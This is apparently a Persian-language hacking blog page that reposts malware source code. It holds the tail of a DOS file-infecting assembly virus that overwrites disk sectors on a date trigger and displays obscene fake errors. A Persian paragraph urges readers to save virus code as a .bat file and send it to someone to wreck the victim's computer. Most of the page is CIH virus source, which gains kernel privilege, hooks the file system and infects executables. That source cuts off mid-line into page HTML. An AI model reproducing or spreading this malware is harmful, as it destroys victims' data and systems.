  mov ah,40h    ;Write to file
  mov cx,offset eof-offset begin ;Length of target code
  lea dx,[bp+offset begin]  ;Point to virus start
  call InfectIt   ;Exempt from encryption
ComeBackHere: mov ax,4200h   ;LSeek to TOF
  xor cx,cx    ;CX= 0
  xor dx,dx    ;DX= 0
  int 21h    ;Call DOS to LSeek
  mov ax,[bp+offset addr]  ;Retrieve location
  inc ax    ;Adjust location
  mov [bp+offset address],ax  ;address to call
  mov byte ptr [bp+offset first_four],0E9h  ;JMP rel16 inst.
  mov byte ptr [bp+offset check],idc ;EOFMARK
  mov ah,40h    ;Write to file
  mov cx,4    ;Write 4 bytes
  lea dx,[bp+offset first_four] ;4 bytes are at [DX]
  int 21h    ;Write to file
  inc byte ptr [bp+offset infected] ;increment counter
  dec byte ptr [bp+offset max2kill] ;decrement counter
  jz TheEnd    ;If 0 then End
  inc byte ptr [bp+offset encrypt_val] ;change code #
  adc byte ptr [bp+offset encrypt_val],0 ;adjust if 0
  jmp nextfile    ;Next victim!
NoneLeft: cmp byte ptr [bp+offset infected],3 ;At least 3 infected?
  jae TheEnd    ;The party's over!
  mov di,100h    ;DI= 100h
  cmp word ptr [di],20CDh  ;an INT 20h?
  je TheEnd    ;Don't go to prev. dir.
  lea dx,[bp+offset prevdir]  ;'..'
  mov ah,3Bh    ;Set current directory
  int 21h    ;CHDIR ..
  jc TheEnd    ;We're through!
  mov ah,4Eh
  jmp continue   ;Start over in new dir
TheEnd:  xor di,di    ;DI= 0
  mov es,di    ;ES= 0
  mov ah,2ah    ;Get date
  int 21h    ;Do it
  cmp dl,4    ;4th of the month?
  jne test2    ;Nope, second test
  cmp dh,7    ;July?
  jne test2    ;Nope, second test
  xor ax,ax    ;Sector 0
  jmp Kill    ;Kill the disk now...
test2:  mov ah,2ch    ;Get time
  int 21h    ;Do it
  or cl,cl    ;On the hour? (x:00 xM)
  jnz GiveUp    ;Return to program
  cmp ch,6    ;Midnight to 5 AM ???
  jnl GiveUp    ;Return to program
  add cl,ch    ;Add first number
  mov ax,cx    ;Transfer to AX
  cbw     ;Zero out AH
  add al,dh    ;Add DL to AL
  adc al,dl    ;Add DL and carry flag
  adc ah,0    ;Add carry to AH
  or ax,ax    ;AX = 0 ???
  jnz Kill    ;Kill the disk now...
  inc ax    ;Well, adjust first...
Kill:  mov dx,ax    ;Sector number
  mov cx,1    ;One at a time....
  xor bx,bx    ;Point at PSP
  mov ah,19h    ;Get current disk
  int 21h    ;Call DOS to ^
  int 26h    ;Now kill the disk
  
GiveUp:  mov bx,offset message_table  ;point to table
  mov ah,2ch    ;Get time
  int 21h    ;Call DOS to ^
  inc dh    ;(0-59)
timeloop: cmp dh,msgs    ;mapped yet?
  jl timedone   ;Yes, jump
  sub dh,msgs    ;try to map it
  jmp short timeloop   ;and check out work
timedone: mov al,dh    ;AL gets msg #
  mov cl,al    ;Save in CL for CritErr
  cbw     ;AH gets 0
  shl ax,1    ;AX = AX * 2
  add bx,ax    ;BX = index
  mov si,[bx]    ;SI points to string
  mov ch,[si-1]   ;CH is technique #
  mov dx,si    ;DX points to string
  mov ah,9    ;Display string
  int 21h    ;Call DOS to ^
  cmp ch,terminate   ;Terminate program?
  je TerminateProg   ;Nope, next test
  cmp ch,halt    ;Halt program?
  je $    ;Hang system if ch=halt
  cmp ch,SimulateCritErr  ;Simulate CritErr?
  je simulate   ;yes, go do it
  cmp ch,Return2host   ;Return to host?
  je ResumeProgram   ;yes, go do it
  cmp ch,FlashFloppy   ;Flash drive A:?
  je FlashFlop   ;Yes, go do it
  cmp ch,WaitKey   ;Wait for keypress?
  je zwait    ;Yes, go do it
 
  cmp ch,PauseKey   ;Pause message w/ wait?
  je zpause    ;Yes, go do it
  cmp ch,StackError   ;Stack overflow?
  je StackErr   ;Yes, go do it
 ;Invalid code, assume Return2host
ResumeProgram: jmp return    ;Return to caller
StackErr: call $    ;Cause stack overflow
TerminateProg: int 20h    ;Yep, all done!
simulate: lea dx,[bp+offset ARIFmsg]  ;Abort, Retry ...
  mov ah,9    ;Print string
  int 21h    ;Call DOS to ^
  mov ah,1    ;Input a char
  int 21h    ;Call DOS to ^
  lea dx,[bp+offset crlf]  ;crlf
  mov ah,9    ;Print string
  int 21h    ;Call DOS to ^
  cmp al,'a'    ;Uppercase?
  jb uppercase   ;Nope, jump
  sub al,' '    ;Yes, make uppercase
uppercase: cmp al,'A'    ;Abort?
  je terminateprog   ;Yep, go do it.
  cmp al,'R'    ;Retry?
  jne zskip    ;skip over "retry" code
  lea dx,[bp+offset crlf]  ;Point to crlf
  mov ah,9    ;Print string
  int 21h    ;Call DOS to ^
  mov dh,cl    ;Restore DH from CL
  jmp timedone   ;Reprint error
zskip:  cmp al,'I'    ;Ignore?
  je ResumeProgram   ;Return to host program
  cmp al,'F'    ;Fail?
  jne simulate   ;Invalid response
  lea dx,[bp+offset fail24]  ;Point to fail string
  mov ah,9    ;Print string
  int 21h    ;Call DOS to ^
  int 20h    ;Terminate program
FlashFlop: mov ah,1    ;Wait for keypress
  int 21h    ;Call DOS to ^
  xor ax,ax    ;Drive A:
  mov cx,1    ;Read 1 sector
  mov dx,ax    ;Start at boot sector
  lea bx,[bp+offset boot_sector] ;BX points to buffer
  int 25h    ;Flash light on A:
  jmp short ResumeProgram  ;Resume if no error
zpause:  lea dx,[bp+offset pause]  ;Point to pause message
  mov ah,9    ;Print string
  int 21h    ;Call DOS to ^
zwait:
  mov ah,1    ;Wait for keypress
  int 21h    ;Call DOS to ^
  jmp short ResumeProgram  ;Go on...
 
 
ARIFmsg db cr,lf,'Abort, Retry, Ignore, Fail?$'
fail24 db cr,lf,cr,lf,'Fail on INT 24'
crlf db cr,lf,'$'
message_table:
 dw offset msg1
 dw offset msg2
 dw offset msg3
 dw offset msg4
 dw offset msg5
 dw offset msg6
 dw offset msg7
 dw offset msg8
 dw offset msg9
 dw offset msg10
 dw offset msg11
 dw offset msg12
 dw offset msg13
 dw offset msg14
 dw offset msg15
 dw offset msg16
 dw offset msg17
 dw offset msg18
 dw offset msg19
 dw offset msg20
msgs db 20
;   I tried to make it as simple as possible to change the messages
;   and add/delete them.  Each message is in the format:
;
;  db [technique]
;[label] db [Text]
;
;   Where [technique] is one of the 8 codes shown at the beginning of
;   this file (terminate, halt, etc.).  This determines what the virus
;   should do after printing the message.
;  [label] is in the form "msg##" where ## is a number from 1 to
;   "msgs".  "msgs" is defined immediately before this
;   comment block.
;  [text] is a combination of text and ASCII codes, terminated by
;   either a '$' or a ,36.
;
;   If you change the number of messages the virus has, you should also
;  add/remove lines from the offset table and change the "msgs"
;  data byte appropriately.  Let's say for instance that you want
;  to remove "Program too big to fit in memory.":
;   1) Delete the line(s) with the message and the line
;    immediately before it.
;   2) Move message #20 up to message #2's position and
;    change its label from "msg20" to "msg2".
;   3) Delete the line "dw offset msg20" from the offset
;    table.
;   4) Change the line before this comment block to:
;    "msgs db 19"
;
; Later!
;   -The BOOT SECTOR Infector ...
;
 db FlashFloppy ;Waits for key, then flashes drive A:
msg5 db 'I',39,'m hungry!  Insert PIZZA & BEER into drive A: and',cr,lf
pause db 'Strike any key when ready... $'
 db SimulateCritErr ;Prints ARIF message and responds appropriately
msg1 db 'Impotence error reading user',39,'s dick$'
 db terminate ;Ends the program immediately
msg2 db 'Program too big to fit in memory',cr,lf,'$'
 db halt  ;Halts the system
msg3 db 'Cannot load COMMAND, system halted',cr,lf,'$'
 db terminate ;Ends the program immediately
msg4 db 'I',39,'m sorry, Dave.... but I',39,'m afraid'
  db ' I can',39,'t do that!',cr,lf,'$'
 db WaitKey  ;Waits for a keypress, then runs the program
msg6 db 'Format another? (Y/N)? $'
 db StackError ;Generates a stack overflow (halts the system)
msg7 db 'Damn it!  I told you not to touch that!$'
 db terminate ;Ends the program immediately
msg8 db 'Suck me!',cr,lf,'$'
 db SimulateCritErr ;Prints ARIF message and responds appropriately
msg9 db 'Cocksucker At Keyboard error reading device CON:$'
 db terminate ;Ends the program immediately
msg10 db 7,cr,cr,cr,7,cr,cr,cr,7,cr,cr,cr,lf
 db 'I',39,'m sorry, but your call cannot be completed as dialed.'
 db cr,lf,'Please hang up & try your call again.',cr,lf,'$'
 db terminate ;Ends the program immediately
msg11 db 'No!',cr,lf,cr,lf,'$'
 db halt  ;Halts the system
msg12 db 'Panic kernal mode interrupt$'
 db WaitKey  ;Waits for a keypress, then runs the program
msg13 db 'CONNECT 1200«',cr,lf,cr,lf,'$'
 db return2host ;Runs host program immediately
msg14 db 'Okay, okay!  Be patient! ...',cr,lf,'$'
 db terminate ;Ends the program immediately
msg15 db 'And if I refuse?',cr,lf,'$'
 db return2host ;Runs host program immediately
msg16 db 'Fuck the world and its followers!',cr,lf,'$'
 db return2host ;Runs host program immediately
msg17 db 'You are pathetic, man... you know that?',cr,lf,'$'
 db terminate ;Ends the program immediately
msg18 db 'Cum on!  Talk DIRTY to me !!!',cr,lf,'$'
 db terminate ;Ends the program immediately
msg19 db 'Your coprocessor wears floppy disks!',cr,lf,'$'
 db PauseKey ;Waits for keypress (SAKWR), then runs host prg
msg20 db 'Joker! ver àà by TBSI!',cr,lf
 db 'Remember!  EVERYTHING',39,'s bigger in Texas!',cr,lf,'$'
int24handler: xor al,al    ;Ignore the error
  iret     ;Interrupt return

filespec: db '*.COM',0   ;File specification
prevdir: db '..',0    ;previous directory
max2kill db 3    ;max. files to infect
eoec:;ؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤEnd Of Encrypted Code
VersionNumber dw 100h    ;Version 1.00
encrypt_val db 0    ;1st-run copy only
; None of this information is included in the virus's code.  It is only used
; during the search/infect routines and it is not necessary to preserve it
; in between calls to them.
eof:
DTA:
  db 21 dup (?)   ;internal search's data
attribute db ?    ;attribute
file_time db 2 dup (?)   ;file's time stamp
file_date db 2 dup (?)   ;file's date stamp
file_size db 4 dup (?)   ;file's size
filename db 13 dup (?)   ;filename
SavedAX  dw ?    ;Used to save AX
infected db ?    ;infection count
addr  dw ?    ;Address
boot_sector:
       main endp;rocedure
       code ends;egment
   end

و یروس خطرناک با نام Good Gory بساز ید! برای ساخت این ویروس اول note pad را باز کرده و این کد ها را در آن کپی و پیست نمایید و بعد گزینه file را زده save as را زده بعد آنرا با پسوند bat ذخیره کنید مثلا Good Gory.bat و save را برای اتمام کار زده و حالا ویروس شما ساخته شد که مواظب باشید روی آن به هیچ وجه کلیک نکنید آنرا برای یکی بفرستید تا سیستم قربانی را به طور خفن داغون کنه موفق باشید نظر یادتون نره!

; ****************************************************************************
; *   The Virus Program Information                        *
; ****************************************************************************
; *                                                                          *
; * Designer : CIH   Source : TTIT of TATUNG in Taiwan    *
; * Create Date : 04/26/1998 Now Version : 1.4                    *
; *     Modification Time : 05/31/1998                                       *
; *              *
; * Turbo Assembler Version 4.0 : tasm /m cih        *
; * Turbo Link Version 3.01  : tlink /3 /t cih, cih.exe      *
; *              *
; *==========================================================================*
; *   Modification History                                 *
; *==========================================================================*
; * v1.0 1. Create the Virus Program.                                 *
; *  2. The Virus Modifies IDT to Get Ring0 Privilege.            *
; * 04/26/1998  3. Virus Code doesn't Reload into System.                    *
; *  4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. *
; *  5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook.  *
; *  6. When System Opens Existing PE File, the File will be      *
; *                Infected, and the File doesn't be Reinfected.             *
; *  7. It is also Infected, even the File is Read-Only.          *
; *  8. When the File is Infected, the Modification Date and Time *
; *     of the File also don't be Changed.                        *
; *  9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call  *
; *     Previous FileSystemApiHook, it will Call the Function     *
; *     that the IFS Manager Would Normally Call to Implement     *
; *     this Particular I/O Request.                              *
; *        10. The Virus Size is only 656 Bytes.                         *
; *==========================================================================*
; * v1.1 1. Especially, the File that be Infected will not Increase   *
; *     it's Size...   ^__^          *
; * 05/15/1998 2. Hook and Modify Structured Exception Handing.      *
; *     When Exception Error Occurs, Our OS System should be in   *
; *     Windows NT. So My Cute Virus will not Continue to Run,    *
; *     it will Jmup to Original Application to Run.       *
; *  3. Use Better Algorithm, Reduce Virus Code Size.      *
; *  4. The Virus "Basic" Size is only 796 Bytes.       *
; *==========================================================================*
; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer...      *
; *  2. Modify the Bug of v1.1         *
; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes.       *
; *==========================================================================*
; * v1.3 1. Modify the Bug that WinZip Self-Extractor Occurs Error.   *
; *     So When Open WinZip Self-Extractor ==> Don't Infect it.   *
; * 05/24/1998 2. The Virus "Basic" Size is 1010 Bytes.       *
; *==========================================================================*
; * v1.4 1. Full Modify the Bug : WinZip Self-Extractor Occurs Error. *
; *  2. Change the Date of Killing Computers.       *
; * 05/31/1998 3. Modify Virus Version Copyright.        *
; *  4. The Virus "Basic" Size is 1019 Bytes.       *
; ****************************************************************************
                .586P
; ****************************************************************************
; *             Original PE Executable File(Don't Modify this Section)       *
; ****************************************************************************
OriginalAppEXE  SEGMENT
FileHeader:
                db      04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h
                db      004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h
                db      0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h
                db      00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh
                db      021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h
                db      069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h
                db      061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh
                db      074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh
                db      020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h
                db      06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah
                db      024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h
                db      0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h
                db      00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
                db      000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h
                db      000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
                db      004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h
                db      000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h
                db      000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
                db      000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
                db      000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h
                db      000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
                db      000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  dd 00000000h, VirusSize
OriginalAppEXE  ENDS
; ****************************************************************************
; *                     My Virus Game                                        *
; ****************************************************************************
; *********************************************************
; *                    Constant Define                    *
; *********************************************************
TRUE   = 1
FALSE   = 0
DEBUG   = TRUE
MajorVirusVersion = 1
MinorVirusVersion = 4
VirusVersion  = MajorVirusVersion*10h+MinorVirusVersion

IF DEBUG
 FirstKillHardDiskNumber = 81h
 HookExceptionNumber     =       05h
ELSE
 FirstKillHardDiskNumber = 80h
 HookExceptionNumber     =       03h
ENDIF

FileNameBufferSize = 7fh
; *********************************************************
; *********************************************************
VirusGame               SEGMENT
                        ASSUME  CS:VirusGame, DS:VirusGame, SS:VirusGame
                        ASSUME  ES:VirusGame, FS:VirusGame, GS:VirusGame
; *********************************************************
; *             Ring3 Virus Game Initial Program          *
; *********************************************************
MyVirusStart:
   push ebp
; *************************************
; * Let's Modify Structured Exception *
; * Handing, Prevent Exception Error  *
; * Occurrence, Especially in NT.     *
; *************************************
   lea eax, [esp-04h*2]
   xor ebx, ebx
   xchg eax, fs:[ebx]
   call @0
@0:
   pop ebx
   lea ecx, StopToRunVirusCode-@0[ebx]
   push ecx
   push eax
; *************************************
; * Let's Modify                      *
; * IDT(Interrupt Descriptor Table)   *
; * to Get Ring0 Privilege...         *
; *************************************
   push eax  ;
                        sidt    [esp-02h]       ; Get IDT Base Address
                        pop     ebx             ;
                        add     ebx, HookExceptionNumber*08h+04h ; ZF = 0
   cli
                        mov     ebp, [ebx]      ; Get Exception Base
                        mov     bp, [ebx-04h]   ; Entry Point
                        lea     esi, MyExceptionHook-@1[ecx]
   push esi
   mov [ebx-04h], si  ;
   shr esi, 16   ; Modify Exception
   mov [ebx+02h], si  ; Entry Point Address
   pop esi
; *************************************
; * Generate Exception to Get Ring0   *
; *************************************
   int HookExceptionNumber ; GenerateException
ReturnAddressOfEndException = $
; *************************************
; * Merge All Virus Code Section      *
; *************************************
   push esi
   mov esi, eax
LoopOfMergeAllVirusCodeSection:
   mov ecx, [eax-04h]
   rep movsb
   sub eax, 08h
   mov esi, [eax]
   or esi, esi
   jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1
   jmp LoopOfMergeAllVirusCodeSection
QuitLoopOfMergeAllVirusCodeSection:
   pop esi
; *************************************
; * Generate Exception Again          *
; *************************************
   int HookExceptionNumber ; GenerateException Again
; *************************************
; * Let's Restore                     *
; * Structured Exception Handing      *
; *************************************
ReadyRestoreSE:
   sti
   xor ebx, ebx
   jmp RestoreSE
; *************************************
; * When Exception Error Occurs,      *
; * Our OS System should be in NT.    *
; * So My Cute Virus will not         *
; * Continue to Run, it Jmups to      *
; * Original Application to Run.      *
; *************************************
StopToRunVirusCode:
@1   = StopToRunVirusCode
   xor ebx, ebx
   mov eax, fs:[ebx]
   mov esp, [eax]
RestoreSE:
   pop dword ptr fs:[ebx]
   pop eax
; *************************************
; * Return Original App to Execute    *
; *************************************
   pop ebp
                        push    00401000h       ; Push Original
OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack
                        ret     ; Return to Original App Entry Point
; *********************************************************
; *             Ring0 Virus Game Initial Program          *
; *********************************************************
MyExceptionHook:
@2   = MyExceptionHook
   jz InstallMyFileSystemApiHook
; *************************************
; * Do My Virus Exist in System !?    *
; *************************************
   mov ecx, dr0
   jecxz AllocateSystemMemoryPage
   add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException
; *************************************
; * Return to Ring3 Initial Program   *
; *************************************
ExitRing0Init:
   mov [ebx-04h], bp ;
   shr ebp, 16  ; Restore Exception
   mov [ebx+02h], bp ;
   iretd
; *************************************
; * Allocate SystemMemory Page to Use *
; *************************************
AllocateSystemMemoryPage:
   mov dr0, ebx ; Set the Mark of My Virus Exist in System
   push 00000000fh ;
   push ecx  ;
   push 0ffffffffh ;
   push ecx  ;
   push ecx  ;
   push ecx  ;
   push 000000001h ;
   push 000000002h ;
   int 20h  ; VMMCALL _PageAllocate
_PageAllocate  = $  ;
   dd 00010053h ; Use EAX, ECX, EDX, and flags
   add esp, 08h*04h
   xchg edi, eax ; EDI = SystemMemory Start Address
   lea eax, MyVirusStart-@2[esi]
   iretd ; Return to Ring3 Initial Program
; *************************************
; * Install My File System Api Hook   *
; *************************************
InstallMyFileSystemApiHook:
   lea eax, FileSystemApiHook-@6[edi]
   push eax  ;
   int 20h  ; VXDCALL IFSMgr_InstallFileSystemApiHook
IFSMgr_InstallFileSystemApiHook = $ ;
   dd      00400067h ; Use EAX, ECX, EDX, and flags
   mov dr0, eax ; Save OldFileSystemApiHook Address
   pop eax ; EAX = FileSystemApiHook Address
   ; Save Old IFSMgr_InstallFileSystemApiHook Entry Point
   mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi]
   mov edx, [ecx]
   mov OldInstallFileSystemApiHook-@3[eax], edx
   ; Modify IFSMgr_InstallFileSystemApiHook Entry Point
   lea eax, InstallFileSystemApiHook-@3[eax]
   mov [ecx], eax
   cli
   jmp ExitRing0Init
; *********************************************************
; *             Code Size of Merge Virus Code Section     *
; *********************************************************
CodeSizeOfMergeVirusCodeSection  = offset $
; *********************************************************
; *             IFSMgr_InstallFileSystemApiHook           *
; *********************************************************
InstallFileSystemApiHook:
   push ebx
   call @4 ;
@4:     ;
   pop ebx ; mov ebx, offset FileSystemApiHook
   add ebx, FileSystemApiHook-@4 ;
   push ebx
   int 20h  ; VXDCALL IFSMgr_RemoveFileSystemApiHook
IFSMgr_RemoveFileSystemApiHook = $
   dd      00400068h ; Use EAX, ECX, EDX, and flags
   pop eax
   ; Call Original IFSMgr_InstallFileSystemApiHook
   ; to Link Client FileSystemApiHook
   push dword ptr [esp+8]
   call OldInstallFileSystemApiHook-@3[ebx]
   pop ecx
   push eax
   ; Call Original IFSMgr_InstallFileSystemApiHook
   ; to Link My FileSystemApiHook
   push ebx
   call OldInstallFileSystemApiHook-@3[ebx]
   pop ecx
   mov dr0, eax ; Adjust OldFileSystemApiHook Address
   pop eax
   pop ebx
   ret
; *********************************************************
; *   Static Data                       *
; *********************************************************
OldInstallFileSystemApiHook dd ?
; *********************************************************
; *             IFSMgr_FileSystemHook                     *
; *********************************************************
; *************************************
; * IFSMgr_FileSystemHook Entry Point *
; *************************************
FileSystemApiHook:
@3   = FileSystemApiHook
   pushad
                        call    @5 ;
@5:     ;
                        pop     esi ; mov esi, offset VirusGameDataStartAddress
                        add     esi, VirusGameDataStartAddress-@5
; *************************************
; * Is OnBusy !?                      *
; *************************************
   test byte ptr (OnBusy-@6)[esi], 01h ; if ( OnBusy )
   jnz pIFSFunc   ; goto pIFSFunc
; *************************************
; * Is OpenFile !?                    *
; *************************************
   ; if ( NotOpenFile )
   ; goto prevhook
   lea ebx, [esp+20h+04h+04h]
   cmp dword ptr [ebx], 00000024h
   jne prevhook
; *************************************
; * Enable OnBusy                     *
; *************************************
   inc byte ptr (OnBusy-@6)[esi] ; Enable OnBusy
; *************************************
; * Get FilePath's DriveNumber,       *
; * then Set the DriveName to         *
; * FileNameBuffer.                   *
; *************************************
; * Ex. If DriveNumber is 03h,        *
; *     DriveName is 'C:'.            *
; *************************************
   ; mov esi, offset FileNameBuffer
   add esi, FileNameBuffer-@6
   push esi
   mov al, [ebx+04h]
   cmp al, 0ffh
   je CallUniToBCSPath
   add al, 40h
   mov ah, ':'
   mov [esi], eax
   inc esi
   inc esi
; *************************************
; * UniToBCSPath                      *
; *************************************
; * This Service Converts             *
; * a Canonicalized Unicode Pathname  *
; * to a Normal Pathname in the       *
; * Specified BCS Character Set.      *
; *************************************
CallUniToBCSPath:
   push 00000000h
   push FileNameBufferSize
   mov ebx, [ebx+10h]
   mov eax, [ebx+0ch]
   add eax, 04h
   push eax
   push esi
   int 20h ; VXDCall UniToBCSPath
UniToBCSPath  = $
   dd 00400041h
   add esp, 04h*04h
; *************************************
; * Is FileName '.EXE' !?             *
; *************************************
   ; cmp [esi+eax-04h], '.EXE'
   cmp [esi+eax-04h], 'EXE.'
   pop esi
   jne DisableOnBusy
IF DEBUG
; *************************************
; * Only for Debug                    *
; *************************************
   ; cmp [esi+eax-06h], 'FUCK'
   cmp [esi+eax-06h], 'KCUF'
   jne DisableOnBusy
ENDIF
; *************************************
; * Is Open Existing File !?          *
; *************************************
   ; if ( NotOpenExistingFile )
   ; goto DisableOnBusy
   cmp word ptr [ebx+18h], 01h
   jne DisableOnBusy
; *************************************
; * Get Attributes of the File        *
; *************************************
   mov ax, 4300h
   int 20h ; VXDCall IFSMgr_Ring0_FileIO
IFSMgr_Ring0_FileIO = $
   dd 00400032h
   jc DisableOnBusy
   push ecx
; *************************************
; * Get IFSMgr_Ring0_FileIO Address   *
; *************************************
   mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi]
   mov edi, [edi]
; *************************************
; * Is Read-Only File !?              *
; *************************************
   test cl, 01h
   jz OpenFile
; *************************************
; * Modify Read-Only File to Write    *
; *************************************
   mov ax, 4301h
   xor ecx, ecx
   call edi ; VXDCall IFSMgr_Ring0_FileIO
; *************************************
; * Open File                         *
; *************************************
OpenFile:
   xor eax, eax
   mov ah, 0d5h
   xor ecx, ecx
   xor edx, edx
   inc edx
   mov ebx, edx
   inc ebx
   call edi ; VXDCall IFSMgr_Ring0_FileIO
   xchg ebx, eax ; mov ebx, FileHandle
; *************************************
; * Need to Restore                   *
; * Attributes of the File !?         *
; *************************************
   pop ecx
   pushf
   test cl, 01h
   jz IsOpenFileOK
; *************************************
; * Restore Attributes of the File    *
; *************************************
   mov ax, 4301h
   call edi ; VXDCall IFSMgr_Ring0_FileIO
; *************************************
; * Is Open File OK !?                *
; *************************************
IsOpenFileOK:
   popf
   jc DisableOnBusy
; *************************************
; * Open File Already Succeed.   ^__^ *
; *************************************
   push esi ; Push FileNameBuffer Address to Stack
   pushf  ; Now CF = 0, Push Flag to Stack
   add esi, DataBuffer-@7 ; mov esi, offset DataBuffer
; ***************************
; * Get OffsetToNewHeader   *
; ***************************
   xor eax, eax
   mov ah, 0d6h
   ; For Doing Minimal VirusCode's Length,
   ; I Save EAX to EBP.
   mov ebp, eax
   push 00000004h
   pop ecx
   push 0000003ch
   pop edx
   call edi ; VXDCall IFSMgr_Ring0_FileIO
   mov edx, [esi]
; ***************************
; * Get 'PE</tr><br>

<tr>
<div id=postdesc>
<a onclick="window.open('./Comments.bs?PostID=76','_blank','width=400, height=450, scrollbars=yes, resizable=yes');" href="javascript:void(0)" title="نظرات"> <a href="./?PostID=76" title="لینک یادداشت"><span dir=ltr>08:53 AM</span></a> | <a href="./Profile.bs?ID=23542980326212" target="_blank" title="نویسنده">مهدی</a> | <a href="./?Cat=8"  title="موضوع">هک بوت کرک ویروس</a> | <a onclick="window.open('./Comments.bs?PostID=76','_blank','width=400, height=450, scrollbars=yes, resizable=yes');" href="javascript:void(0)" title="نظرات">نظرات [0]</a></div>
</tr>
</div>
</div>

<div id=post>
<tr>
<div id=postdate>سه شنبه 1 آذر ماه سال 1384</div>
</tr>
<tr>
<div id=posttitle>ایمیل از کسی به کسی دیگر(fAKE MAIL)</div>
</tr>
<tr>
